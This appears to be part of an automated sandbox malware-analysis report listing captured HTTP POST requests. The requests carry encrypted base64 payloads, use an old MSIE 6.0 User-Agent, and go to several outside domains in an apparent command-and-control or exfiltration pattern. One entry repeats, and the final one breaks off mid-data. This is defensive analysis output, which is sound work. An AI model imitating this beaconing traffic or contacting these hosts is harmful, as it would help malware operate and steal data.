                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 69 67 4a 44 52 50 45 34 65 35 51 79 78 41 52 6d 45 4e 33 70 62 6b 70 65 31 37 41 76 37 58 63 4a 74 61 34 50 57 4d 2b 4f 6d 6a 63 78 4a 49 43 64 65 69 2b 45 67 44 46 2f 54 2f 50 46 66 4e 4b 58 53 4f 43 44 6c 77 72 4c 36 70 67 78 64 48 4e 50 56 6a 79 35 63 39 76 71 31 74 74 32 50 5a 35 52 71 38 76 47 37 59 78 46 34 50 4a 49 58 79 62 30 48 72 39 78 72 6e 5a 32 4f 53 6f 69 6c 72 33 67 72 61 62 47 35 62 31 42 48 32 30 34 77 33 45 67 4f 52 4b 48 36 52 44 38 49 36 73 49 45 77 76 6f 73 71 33 5a 6a 31 41 2f 33 79 43 4c 6e 35 61 2f 43 56 54 50 79 56 6f 2b 51 71 4a 58 41 5a 49 6a 76 6d 35 32 52 67 7a 7a 63 78 54 50 74 6c 52 75 41 4a 41 43 68 55 73 4b 70 2f 68 73 61 39 33 71 71 79 56 49 51 33 52 42 31 4d 53 75 4c 57 52 63 38 66 7a 7a 57 39 6d 43 71 67 56 79 74 58 4c 53 70 44 58 4b 61 64 30 4b 76 75 6a 31 37 70 7a 6d 2b 53 63 32 35 31 39 49 69 4b 43 57 59 47 36 6b 5a 48 6a 51 71 76 7a 68 49 63 45 34 4e 77 37 75 56 58 76 6c 34 79 62 59 58 4e 66 33 59 6a 72 46 75 42 52 6a 78 39 50 31 52 39 39 70 4e 6c 37 43 6c 4b 35 6e 33 4f 34 42 36 67 57 59 77 36 4f 31 6f 5a 53 4e 64 2b 55 6f 74 39 4a 62 68 68 65 34 49 47 6a 58 51 4b 74 75 4d 39 4f 5a 2b 42 49 64 51 32 37 73 6a 6b 7a 42 2b 41 2f 69 59 78 55 72 57 71 51 55 6d 37 75 4f 54 72 49 50 42 55 52 45 76 45 2b 77 2b 35 66 30 32 4c 2f 2b 56 47 54 4e 4c 59 6d 74 37 43 54 63 6a 55 69 58 6a 68 35 79 30 64 63 79 43 4c 32 46 74 68 4d 30 58 74 4c 68 4a 6e 4c 74 34 72 33 2f 6e 49 47 34 43 48 71 30 47 73 32 4e 50 6f 67 45 51 69 63 36 39 71 75 73 74 4a 74 57 66 64 55 46 63 5a 6c 50 67 6d 79 4e 51 4c 71 59 76 58 69 37 6e 61 48 38 4b 5a 52 7a 64 50 33 62 76 52 37 64 74 74 43 56 43 63 35 72 35 6b 6a 6d 79 56 57 52 52 6d 77 32 64 47 79 4e 44 68 44 47 4f 2f 70 71 4a 42 4e 47 73 67 3d 3d Data Ascii: igJDRPE4e5QyxARmEN3pbkpe17Av7XcJta4PWM+OmjcxJICdei+EgDF/T/PFfNKXSOCDlwrL6pgxdHNPVjy5c9vq1tt2PZ5Rq8vG7YxF4PJIXyb0Hr9xrnZ2OSoilr3grabG5b1BH204w3EgORKH6RD8I6sIEwvosq3Zj1A/3yCLn5a/CVTPyVo+QqJXAZIjvm52RgzzcxTPtlRuAJAChUsKp/hsa93qqyVIQ3RB1MSuLWRc8fzzW9mCqgVytXLSpDXKad0Kvuj17pzm+Sc2519IiKCWYG6kZHjQqvzhIcE4Nw7uVXvl4ybYXNf3YjrFuBRjx9P1R99pNl7ClK5n3O4B6gWYw6O1oZSNd+Uot9Jbhhe4IGjXQKtuM9OZ+BIdQ27sjkzB+A/iYxUrWqQUm7uOTrIPBUREvE+w+5f02L/+VGTNLYmt7CTcjUiXjh5y0dcyCL2FthM0XtLhJnLt4r3/nIG4CHq0Gs2NPogEQic69qustJtWfdUFcZlPgmyNQLqYvXi7naH8KZRzdP3bvR7dttCVCc5r5kjmyVWRRmw2dGyNDhDGO/pqJBNGsg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 35 61 38 62 6d 6c 6a 7a 6c 70 53 53 67 43 59 41 57 31 36 6d 73 45 74 73 71 73 45 67 59 55 4b 2f 44 44 53 6c 4a 73 42 48 47 55 46 47 6d 54 6c 7a 54 52 4b 58 5a 59 77 5a 31 2f 78 38 49 30 6c 43 6a 6f 64 62 76 36 39 63 55 32 7a 67 66 43 66 65 64 61 69 50 6b 77 2f 36 63 69 7a 4b 36 42 4c 68 4d 72 48 73 70 36 36 4d 37 71 64 6d 4d 71 76 6d 47 39 78 57 45 4a 66 30 6d 72 72 34 57 76 6d 47 4b 73 31 5a 69 6d 38 5a 79 72 42 77 38 7a 77 64 44 6f 48 2b 50 71 67 7a 4c 72 41 6c 53 73 31 31 6b 79 74 66 52 30 44 62 51 62 39 78 4f 6c 78 2f 55 78 44 49 4e 41 32 4b 65 70 4f 75 41 4c 71 53 38 4a 49 4b 6a 48 63 32 67 41 55 61 42 2b 77 50 2b 47 53 7a 39 33 76 2b 4c 42 57 61 4c 54 6b 77 4d 6d 38 67 6a 34 57 4b 66 4a 33 71 6b 46 6f 61 6f 57 68 68 44 69 35 53 47 71 73 66 7a 78 6a 37 6c 7a 68 77 4a 48 56 46 2b 51 4a 41 76 43 70 6b 58 6e 75 6a 44 30 72 47 4b 79 57 71 78 5a 4c 50 38 77 73 73 47 79 5a 73 46 32 70 6e 4a 75 33 4c 34 75 66 51 45 49 50 62 54 4d 66 76 47 42 68 71 76 59 62 49 53 55 42 49 75 71 6f 77 2f 66 44 48 53 4a 7a 4d 4e 51 6e 31 78 53 6f 4c 6d 76 65 38 78 56 4d 6b 75 4b 4f 49 51 63 50 47 44 75 43 76 76 4a 68 2f 36 30 62 76 75 53 74 34 53 4c 7a 35 35 4a 4f 50 4a 6b 50 6d 72 44 75 4d 56 32 76 6c 42 6f 54 72 46 6e 66 4f 61 54 4b 66 4b 47 5a 78 56 4f 56 44 7a 65 6f 4f 51 53 58 31 31 6f 4a 44 54 67 56 4d 54 77 4e 7a 6f 79 70 74 55 4a 4e 51 76 59 7a 6f 50 4c 61 6c 76 58 70 39 44 58 42 32 41 2b 35 45 43 4c 49 51 65 55 48 52 34 52 67 50 4a 34 6f 41 4c 42 43 6c 38 6c 6a 53 38 36 6f 67 77 4e 2f 5a 50 6a 79 42 58 50 71 77 53 6c 71 39 6d 36 49 6b 30 38 45 31 43 6b 77 73 42 68 6f 67 5a 69 64 69 70 61 66 65 6e 72 32 30 56 58 44 6d 35 64 54 34 33 48 4b 41 72 4b 49 43 54 71 35 76 68 79 48 33 39 4a 69 32 71 45 76 6e 45 6b 48 47 72 78 77 4f 54 4f 31 61 68 31 58 6a Data Ascii: 5a8bmljzlpSSgCYAW16msEtsqsEgYUK/DDSlJsBHGUFGmTlzTRKXZYwZ1/x8I0lCjodbv69cU2zgfCfedaiPkw/6cizK6BLhMrHsp66M7qdmMqvmG9xWEJf0mrr4WvmGKs1Zim8ZyrBw8zwdDoH+PqgzLrAlSs11kytfR0DbQb9xOlx/UxDINA2KepOuALqS8JIKjHc2gAUaB+wP+GSz93v+LBWaLTkwMm8gj4WKfJ3qkFoaoWhhDi5SGqsfzxj7lzhwJHVF+QJAvCpkXnujD0rGKyWqxZLP8wssGyZsF2pnJu3L4ufQEIPbTMfvGBhqvYbISUBIuqow/fDHSJzMNQn1xSoLmve8xVMkuKOIQcPGDuCvvJh/60bvuSt4SLz55JOPJkPmrDuMV2vlBoTrFnfOaTKfKGZxVOVDzeoOQSX11oJDTgVMTwNzoyptUJNQvYzoPLalvXp9DXB2A+5ECLIQeUHR4RgPJ4oALBCl8ljS86ogwN/ZPjyBXPqwSlq9m6Ik08E1CkwsBhogZidipafenr20VXDm5dT43HKArKICTq5vhyH39Ji2qEvnEkHGrxwOTO1ah1Xj
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 46 45 62 69 53 30 4f 35 6e 4a 52 35 35 31 79 75 53 67 33 41 55 57 79 49 41 6b 48 70 41 46 77 52 4a 78 4f 55 4c 76 4e 43 64 47 69 68 69 34 75 75 47 4d 62 43 32 76 6b 32 43 64 43 2f 2f 59 76 36 36 58 62 78 2b 55 37 45 6f 66 65 4f 38 44 70 64 5a 68 57 37 69 57 35 78 57 56 77 55 72 77 2b 38 34 45 71 6f 6a 4a 47 57 30 4d 7a 41 74 4f 53 56 38 4f 74 53 46 41 76 6b 59 42 4b 58 7a 6e 58 63 49 42 77 69 64 54 57 32 51 47 64 51 4a 2f 53 37 7a 62 4b 7a 79 76 65 50 37 6f 53 6e 49 67 4e 61 32 61 37 74 68 48 69 4b 4a 70 76 47 4a 38 4d 2b 52 69 61 44 37 6d 34 33 66 2f 4b 5a 46 42 62 64 52 36 54 69 42 41 5a 4e 54 67 58 46 58 49 44 64 4b 77 64 2f 4b 6a 41 58 77 74 33 37 52 67 31 72 56 53 54 45 68 71 37 4d 66 70 6e 58 62 66 43 30 56 59 53 47 42 54 6d 4d 53 50 65 56 35 47 38 70 2b 6e 6c 78 79 75 75 78 73 37 63 66 38 41 2f 70 37 34 6e 41 4a 75 55 39 46 4e 65 58 66 4f 32 58 78 39 61 6a 31 33 6a 79 67 78 2b 42 69 47 54 2b 2b 68 5a 4b 32 4b 73 78 4a 6a 6a 51 75 69 59 35 4a 68 70 4d 57 58 35 55 31 4c 4b 62 35 43 36 77 56 4a 67 79 6c 77 33 72 4a 4e 43 58 77 5a 75 44 6d 36 71 62 74 46 78 64 70 77 79 41 38 38 55 61 75 51 35 4e 56 67 6b 49 36 43 42 6c 7a 6c 39 35 44 2f 63 76 31 58 6a 45 5a 45 61 71 56 53 4e 56 62 6b 68 79 77 42 55 79 6a 37 6e 4b 76 50 59 74 71 4e 73 45 76 58 45 56 69 31 68 41 33 78 30 6b 30 63 63 69 50 66 79 6f 56 6c 6d 59 75 4c 41 31 6a 6f 36 7a 71 76 4e 5a 45 50 38 62 66 65 4a 6b 5a 34 72 64 62 66 66 66 66 41 2f 42 79 34 4a 68 55 76 51 6f 6a 71 77 50 75 73 74 39 67 59 31 62 6c 44 69 36 6b 2f 47 32 75 70 67 74 41 74 79 73 68 6d 2b 49 7a 51 57 70 65 64 2f 68 4f 42 62 47 32 78 43 64 75 6f 54 68 2f 36 33 62 33 6a 53 46 39 38 42 47 47 53 30 4f 4b 31 65 67 4c 55 5a 72 73 70 4e 78 79 51 3d 3d Data Ascii: FEbiS0O5nJR551yuSg3AUWyIAkHpAFwRJxOULvNCdGihi4uuGMbC2vk2CdC//Yv66Xbx+U7EofeO8DpdZhW7iW5xWVwUrw+84EqojJGW0MzAtOSV8OtSFAvkYBKXznXcIBwidTW2QGdQJ/S7zbKzyveP7oSnIgNa2a7thHiKJpvGJ8M+RiaD7m43f/KZFBbdR6TiBAZNTgXFXIDdKwd/KjAXwt37Rg1rVSTEhq7MfpnXbfC0VYSGBTmMSPeV5G8p+nlxyuuxs7cf8A/p74nAJuU9FNeXfO2Xx9aj13jygx+BiGT++hZK2KsxJjjQuiY5JhpMWX5U1LKb5C6wVJgylw3rJNCXwZuDm6qbtFxdpwyA88UauQ5NVgkI6CBlzl95D/cv1XjEZEaqVSNVbkhywBUyj7nKvPYtqNsEvXEVi1hA3x0k0cciPfyoVlmYuLA1jo6zqvNZEP8bfeJkZ4rdbffffA/By4JhUvQojqwPust9gY1blDi6k/G2upgtAtyshm+IzQWped/hOBbG2xCduoTh/63b3jSF98BGGS0OK1egLUZrspNxyQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 4a 31 73 34 66 42 39 4c 6e 70 53 6d 4a 39 57 75 66 68 31 75 4d 4b 6a 6d 6c 6e 37 31 6a 62 51 64 77 33 77 52 52 2f 62 78 49 79 51 59 2b 4e 4f 6c 67 33 61 53 33 74 74 36 4b 4e 6a 4e 2f 44 4c 47 65 35 61 61 6c 38 43 6f 6a 62 54 43 4d 79 5a 34 4f 42 59 66 48 75 37 6e 59 2f 52 4f 49 38 7a 52 50 73 49 45 48 7a 46 32 6d 35 76 59 4d 6f 38 68 6a 37 68 51 62 57 42 67 45 6d 6d 76 4e 6c 36 53 36 65 55 47 46 58 57 43 6d 57 77 46 4d 6a 53 51 56 59 64 4a 76 6e 56 4a 62 70 5a 68 50 33 55 58 71 2b 2b 68 6b 43 66 30 46 5a 52 55 67 4c 73 63 2b 76 33 72 34 42 78 36 6f 66 77 6d 6e 51 57 45 74 4f 31 67 44 50 64 47 59 6e 48 30 6b 4e 6c 5a 71 59 79 59 47 66 59 57 79 34 58 46 4f 76 6d 7a 4a 36 35 49 70 57 6a 51 69 35 41 43 74 76 4f 41 67 31 46 74 74 33 2b 62 6d 59 66 39 5a 59 4d 79 77 47 37 36 5a 33 36 45 6a 32 4f 35 63 6b 50 78 32 44 64 72 6f 5a 68 38 4b 4b 70 4d 38 70 64 6f 48 69 4a 6d 7a 4e 6b 6a 67 63 37 73 47 4c 61 61 77 6b 49 49 39 7a 6f 64 45 53 42 59 73 54 44 41 54 2b 35 6c 6d 6b 6a 79 38 43 65 39 72 71 75 33 51 41 44 61 5a 72 6c 39 53 6e 62 4c 2f 56 41 4e 69 75 6b 37 54 6d 4d 50 78 63 52 6a 73 57 48 66 6c 62 36 34 63 6a 2b 6b 5a 67 32 74 45 78 71 6b 71 76 52 46 35 2f 6b 36 41 2b 68 41 51 48 39 49 50 58 30 67 71 75 59 58 56 32 54 59 70 67 78 32 52 56 66 72 49 38 6f 73 56 37 76 2f 2f 6c 6a 4f 6a 33 4a 54 4b 46 6b 31 34 73 6b 43 53 6c 63 31 67 4e 63 43 31 4e 5a 55 63 31 5a 2f 73 42 67 34 47 52 75 79 41 45 55 63 64 46 4b 53 68 75 78 73 36 57 48 4d 6f 71 4b 2f 6f 41 43 41 69 56 66 4d 62 6b 65 6c 4c 62 77 37 58 76 65 53 35 52 4a 73 72 75 54 49 51 4f 48 2b 61 6b 38 62 73 72 4b 47 2b 6b 58 59 51 78 79 6b 31 52 78 32 39 48 47 56 61 31 45 36 71 4d 4a 65 71 68 52 41 52 6d 6b 72 78 32 2b 4b 59 5a 4e 37 49 5a 34 73 6a 61 55 32 4c 34 4e 6a 50 77 3d 3d Data Ascii: J1s4fB9LnpSmJ9Wufh1uMKjmln71jbQdw3wRR/bxIyQY+NOlg3aS3tt6KNjN/DLGe5aal8CojbTCMyZ4OBYfHu7nY/ROI8zRPsIEHzF2m5vYMo8hj7hQbWBgEmmvNl6S6eUGFXWCmWwFMjSQVYdJvnVJbpZhP3UXq++hkCf0FZRUgLsc+v3r4Bx6ofwmnQWEtO1gDPdGYnH0kNlZqYyYGfYWy4XFOvmzJ65IpWjQi5ACtvOAg1Ftt3+bmYf9ZYMywG76Z36Ej2O5ckPx2DdroZh8KKpM8pdoHiJmzNkjgc7sGLaawkII9zodESBYsTDAT+5lmkjy8Ce9rqu3QADaZrl9SnbL/VANiuk7TmMPxcRjsWHflb64cj+kZg2tExqkqvRF5/k6A+hAQH9IPX0gquYXV2TYpgx2RVfrI8osV7v//ljOj3JTKFk14skCSlc1gNcC1NZUc1Z/sBg4GRuyAEUcdFKShuxs6WHMoqK/oACAiVfMbkelLbw7XveS5RJsruTIQOH+ak8bsrKG+kXYQxyk1Rx29HGVa1E6qMJeqhRARmkrx2+KYZN7IZ4sjaU2L4NjPw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 76 4c 67 67 54 7a 76 55 6e 4a 52 4e 4b 78 47 50 30 6a 79 34 2f 69 52 36 42 58 6c 42 6f 7a 46 4c 6e 32 45 78 76 75 6a 54 35 75 70 4a 78 70 4b 67 42 75 48 71 4c 71 34 42 46 77 61 51 4d 2b 47 6e 7a 6a 39 31 37 57 4f 6f 76 59 42 63 43 2f 76 43 56 78 7a 63 53 57 69 65 46 44 4c 62 62 63 4d 72 66 36 57 46 30 76 71 39 4b 69 4c 4f 2f 48 44 52 74 43 41 4f 4e 6b 32 33 54 56 39 59 49 77 47 45 61 65 53 68 37 4c 65 69 64 79 66 6a 44 71 74 51 6e 48 6b 41 47 69 43 42 63 66 67 50 52 44 43 72 52 49 74 52 2b 63 47 7a 6b 6f 5a 54 48 31 6d 48 55 2b 63 7a 67 68 7a 36 6a 47 65 58 43 58 4c 30 6e 4b 30 59 7a 63 2b 63 50 33 63 43 53 36 41 54 63 6b 70 44 50 4b 6f 52 48 52 6e 6c 74 49 44 64 79 52 61 6f 43 4d 6a 62 78 4f 45 63 45 2f 52 73 4e 62 73 50 74 53 6b 54 4a 52 6b 72 65 59 2b 53 69 55 4f 30 47 42 6f 55 6d 4b 49 6e 59 76 78 6e 4a 30 72 67 57 4b 6d 70 43 41 2b 70 64 66 66 58 4b 5a 77 55 69 68 30 75 2f 6e 43 39 43 7a 4b 6a 66 34 59 70 52 34 74 64 32 39 66 4b 51 6f 64 4a 52 31 7a 6e 32 48 45 56 5a 75 49 6b 37 6f 63 70 4c 57 67 38 4c 6a 4a 41 58 71 54 6e 69 75 4c 41 46 2f 6f 42 74 6b 62 45 55 7a 43 53 52 42 62 71 69 76 47 7a 4d 50 58 2f 71 35 53 64 2f 49 53 30 64 6d 38 69 74 41 4f 47 2f 78 36 41 4d 6a 57 73 6d 62 69 46 2f 51 51 6e 67 4e 49 4b 36 6d 39 6a 34 65 42 7a 6d 37 41 49 2f 6b 7a 5a 71 53 41 2f 79 31 76 2b 7a 49 57 34 43 74 39 62 4a 43 62 62 51 6a 6d 46 78 69 45 39 4e 63 4d 34 6b 42 4e 5a 36 47 49 35 45 37 73 41 62 77 37 58 47 70 57 43 6d 74 46 4c 4f 49 51 4d 62 32 4d 73 5a 67 78 70 62 54 59 68 74 42 62 58 52 4c 4f 44 56 59 53 39 57 55 75 35 2f 62 6b 6a 6d 6d 79 6c 55 39 31 4b 75 68 4f 30 77 50 77 4a 64 75 39 44 Data Ascii: vLggTzvUnJRNKxGP0jy4/iR6BXlBozFLn2ExvujT5upJxpKgBuHqLq4BFwaQM+Gnzj917WOovYBcC/vCVxzcSWieFDLbbcMrf6WF0vq9KiLO/HDRtCAONk23TV9YIwGEaeSh7LeidyfjDqtQnHkAGiCBcfgPRDCrRItR+cGzkoZTH1mHU+czghz6jGeXCXL0nK0Yzc+cP3cCS6ATckpDPKoRHRnltIDdyRaoCMjbxOEcE/RsNbsPtSkTJRkreY+SiUO0GBoUmKInYvxnJ0rgWKmpCA+pdffXKZwUih0u/nC9CzKjf4YpR4td29fKQodJR1zn2HEVZuIk7ocpLWg8LjJAXqTniuLAF/oBtkbEUzCSRBbqivGzMPX/q5Sd/IS0dm8itAOG/x6AMjWsmbiF/QQngNIK6m9j4eBzm7AI/kzZqSA/y1v+zIW4Ct9bJCbbQjmFxiE9NcM4kBNZ6GI5E7sAbw7XGpWCmtFLOIQMb2MsZgxpbTYhtBbXRLODVYS9WUu5/bkjmmylU91KuhO0wPwJdu9D
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 76 4c 67 67 54 7a 76 55 6e 4a 52 4e 4b 78 47 50 30 6a 79 34 2f 69 52 36 42 58 6c 42 6f 7a 46 4c 6e 32 45 78 76 75 6a 54 35 75 70 4a 78 70 4b 67 42 75 48 71 4c 71 34 42 46 77 61 51 4d 2b 47 6e 7a 6a 39 31 37 57 4f 6f 76 59 42 63 43 2f 76 43 56 78 7a 63 53 57 69 65 46 44 4c 62 62 63 4d 72 66 36 57 46 30 76 71 39 4b 69 4c 4f 2f 48 44 52 74 43 41 4f 4e 6b 32 33 54 56 39 59 49 77 47 45 61 65 53 68 37 4c 65 69 64 79 66 6a 44 71 74 51 6e 48 6b 41 47 69 43 42 63 66 67 50 52 44 43 72 52 49 74 52 2b 63 47 7a 6b 6f 5a 54 48 31 6d 48 55 2b 63 7a 67 68 7a 36 6a 47 65 58 43 58 4c 30 6e 4b 30 59 7a 63 2b 63 50 33 63 43 53 36 41 54 63 6b 70 44 50 4b 6f 52 48 52 6e 6c 74 49 44 64 79 52 61 6f 43 4d 6a 62 78 4f 45 63 45 2f 52 73 4e 62 73 50 74 53 6b 54 4a 52 6b 72 65 59 2b 53 69 55 4f 30 47 42 6f 55 6d 4b 49 6e 59 76 78 6e 4a 30 72 67 57 4b 6d 70 43 41 2b 70 64 66 66 58 4b 5a 77 55 69 68 30 75 2f 6e 43 39 43 7a 4b 6a 66 34 59 70 52 34 74 64 32 39 66 4b 51 6f 64 4a 52 31 7a 6e 32 48 45 56 5a 75 49 6b 37 6f 63 70 4c 57 67 38 4c 6a 4a 41 58 71 54 6e 69 75 4c 41 46 2f 6f 42 74 6b 62 45 55 7a 43 53 52 42 62 71 69 76 47 7a 4d 50 58 2f 71 35 53 64 2f 49 53 30 64 6d 38 69 74 41 4f 47 2f 78 36 41 4d 6a 57 73 6d 62 69 46 2f 51 51 6e 67 4e 49 4b 36 6d 39 6a 34 65 42 7a 6d 37 41 49 2f 6b 7a 5a 71 53 41 2f 79 31 76 2b 7a 49 57 34 43 74 39 62 4a 43 62 62 51 6a 6d 46 78 69 45 39 4e 63 4d 34 6b 42 4e 5a 36 47 49 35 45 37 73 41 62 77 37 58 47 70 57 43 6d 74 46 4c 4f 49 51 4d 62 32 4d 73 5a 67 78 70 62 54 59 68 74 42 62 58 52 4c 4f 44 56 59 53 39 57 55 75 35 2f 62 6b 6a 6d 6d 79 6c 55 39 31 4b 75 68 4f 30 77 50 77 4a 64 75 39 44 Data Ascii: vLggTzvUnJRNKxGP0jy4/iR6BXlBozFLn2ExvujT5upJxpKgBuHqLq4BFwaQM+Gnzj917WOovYBcC/vCVxzcSWieFDLbbcMrf6WF0vq9KiLO/HDRtCAONk23TV9YIwGEaeSh7LeidyfjDqtQnHkAGiCBcfgPRDCrRItR+cGzkoZTH1mHU+czghz6jGeXCXL0nK0Yzc+cP3cCS6ATckpDPKoRHRnltIDdyRaoCMjbxOEcE/RsNbsPtSkTJRkreY+SiUO0GBoUmKInYvxnJ0rgWKmpCA+pdffXKZwUih0u/nC9CzKjf4YpR4td29fKQodJR1zn2HEVZuIk7ocpLWg8LjJAXqTniuLAF/oBtkbEUzCSRBbqivGzMPX/q5Sd/IS0dm8itAOG/x6AMjWsmbiF/QQngNIK6m9j4eBzm7AI/kzZqSA/y1v+zIW4Ct9bJCbbQjmFxiE9NcM4kBNZ6GI5E7sAbw7XGpWCmtFLOIQMb2MsZgxpbTYhtBbXRLODVYS9WUu5/bkjmmylU91KuhO0wPwJdu9D
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheData Raw: 75 6d 57 55 34 44 73 39 6d 5a 54 2f 37 70 32 41 30 70 46 66 30 53 54 4c 59 69 52 42 67 44 51 57 6e 35 72 6f 48 38 45 44 6d 6d 36 44 39 68 57 7a 71 59 57 42 4c 51 30 45 36 53 4a 55 76 51 63 61 67 4f 4d 6c 34 43 2b 6b 72 4c 4d 79 5a 6b 53 34 4e 71 65 42 55 36 4b 65 51 4a 46 31 76 66 45 51 61 31 6a 66 64 44 64 56 31 37 6a 62 48 6e 64 37 50 51 65 56 73 62 6f 56 4b 2b 62 49 76 33 2b 75 54 5a 4a 34 79 54 49 41 77 72 5a 65 2b 35 52 64 68 6f 48 75 47 78 42 4e 6f 76 69 75 4f 61 44 69 2f 4c 38 33 64 68 47 38 78 78 42 31 79 50 58 48 36 43 79 44 56 36 67 67 6b 55 72 75 67 7a 48 61 6d 36 45 62 79 6f 2b 6f 35 46 44 4f 59 35 36 6f 63 48 73 74 71 44 51 37 43 38 73 55 73 38 6d 35 77 62 79 75 70 32 73 2b 38 79 33 39 33 78 43 6b 31 76 4a 72 62 74 6d 4e 72 33 41 33 45 38 71 47 75 39 58 39 69 38 52 77 45 73 58 59 49 45 6c 49 7a 38 45 47 67 52 4a 36 76 59 58 78 34 50 54 38 63 6c 4a 70 35 66 43 2b 4e 6d 69 67 2b 6d 67 33 47 71 38 4a 67 67 55 42 47 6b 43 42 55 5a 37 34 34 36 33 33 63 74 48 49 65 53 52 59 31 67 4f 44 70 48 4c 44 4b 75 62 6d 75 31 61 61 46 4e 4f 47 5a 42 4a 63 31 78 6f 35 4a 32 6c 6e 34 77 67 61 62 34 69 2f 70 6f 45 5a 61 62 4b 51 39 69 74 57 70 6d 6d 7a 66 57 46 62 52 39 37 30 2f 4e 67 76 6f 35 31 65 69 39 6b 39 77 33 4b 45 46 73 74 45 6b 31 5a 45 4d 76 4e 41 4a 55 41 6a 43 77 59 58 4c 77 30 63 76 6c 6d 61 33 71 4e 42 53 70 63 2f 72 4f 59 34 33 42 58 4d 59 54 48 63 66 57 68 54 44 47 4f 41 69 6e 6a 4f 64 4b 58 6a 6e 6f 52 67 2f 49 76 48 38 4d 30 72 6a 63 79 67 78 64 47 30 61 38 63 2f 6d 44 78 48 35 66 56 49 49 6c 64 59 73 6f 64 55 4d 51 46 59 75 34 53 54 72 33 4d 54 6c 42 4b 47 55 48 59 55 4d 76 44 55 43 43 61 42 35 44 6f 57 Data Ascii: umWU4Ds9mZT/7p2A0pFf0STLYiRBgDQWn5roH8EDmm6D9hWzqYWBLQ0E6SJUvQcagOMl4C+krLMyZkS4NqeBU6KeQJF1vfEQa1jfdDdV17jbHnd7PQeVsboVK+bIv3+uTZJ4yTIAwrZe+5RdhoHuGxBNoviuOaDi/L83dhG8xxB1yPXH6CyDV6ggkUrugzHam6Ebyo+o5FDOY56ocHstqDQ7C8sUs8m5wbyup2s+8y393xCk1vJrbtmNr3A3E8qGu9X9i8RwEsXYIElIz8EGgRJ6vYXx4PT8clJp5fC+Nmig+mg3Gq8JggUBGkCBUZ744633ctHIeSRY1gODpHLDKubmu1aaFNOGZBJc1xo5J2ln4wgab4i/poEZabKQ9itWpmmzfWFbR970/Ngvo51ei9k9w3KEFstEk1ZEMvNAJUAjCwYXLw0cvlma3qNBSpc/rOY43BXMYTHcfWhTDGOAinjOdKXjnoRg/IvH8M0rjcygxdG0a8c/mDxH5fVIIldYsodUMQFYu4STr3MTlBKGUHYUMvDUCCaB5DoW
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 6a 71 59 36 39 71 79 52 71 70 52 4e 78 79 76 4f 6c 2b 48 75 2b 4c 38 68 35 41 6b 45 45 4e 41 67 6f 4b 31 55 72 7a 38 4a 47 6e 46 44 4f 68 43 36 48 31 64 4e 58 4c 6f 74 42 76 38 72 51 38 5a 51 49 47 51 4d 35 32 67 30 55 41 2f 6b 31 32 4a 47 6f 33 46 61 62 2f 74 6f 69 34 38 45 79 66 6d 30 72 53 4e 56 75 62 30 78 46 6f 5a 77 4b 38 50 2b 6b 35 4a 76 4d 41 65 72 45 61 56 35 30 4b 4d 54 48 57 31 4e 42 54 5a 49 45 79 47 67 69 35 70 44 6d 41 78 6d 59 6f 70 4f 55 6b 45 48 4a 67 73 75 2f 56 77 54 52 6a 68 4f 4d 59 65 4a 70 58 79 35 42 57 48 68 2b 54 56 6a 64 6a 4d 63 42 4b 41 71 63 58 55 6f 75 56 39 68 77 77 68 58 38 59 73 75 4e 66 49 68 73 37 44 43 6c 65 79 78 70 53 4e 55 41 62 78 77 50 31 56 54 30 44 59 30 63 74 47 48 5a 49 36 55 51 51 74 35 56 6b 6e 62 66 6e 4c 31 76 4d 6b 35 6b 41 57 37 50 2f 52 6d 38 59 74 76 50 4c 42 6d 32 6a 66 6e 2b 34 36 45 53 70 6c 38 49 43 46 6f 6b 32 72 43 4a 4f 34 53 48 63 6c 79 65 74 46 52 2f 6b 72 44 4f 30 50 68 54 38 42 70 45 75 57 73 67 51 7a 44 6b 6f 77 6a 61 75 59 69 5a 44 4d 68 30 38 56 38 50 35 65 36 67 70 58 41 53 6c 67 53 76 4b 70 58 67 2f 41 56 55 6e 43 4f 56 6c 4a 4b 48 36 61 6f 37 74 32 50 5a 79 70 4a 6e 4f 4d 6b 30 69 57 4c 4f 59 52 53 66 65 64 4a 71 52 67 38 51 4d 51 38 48 64 49 47 33 2b 32 4f 70 55 79 53 4c 70 4c 72 47 2b 73 38 4a 69 53 33 78 69 6b 38 35 5a 6f 4b 72 68 49 73 5a 54 66 73 57 77 46 44 48 38 42 4e 43 45 54 56 4a 64 46 6f 73 45 78 33 73 75 76 51 52 35 2b 5a 6b 67 72 51 45 72 62 7a 38 4d 78 39 63 6b 53 6b 33 2b 58 56 75 70 46 68 79 76 37 35 4d 77 74 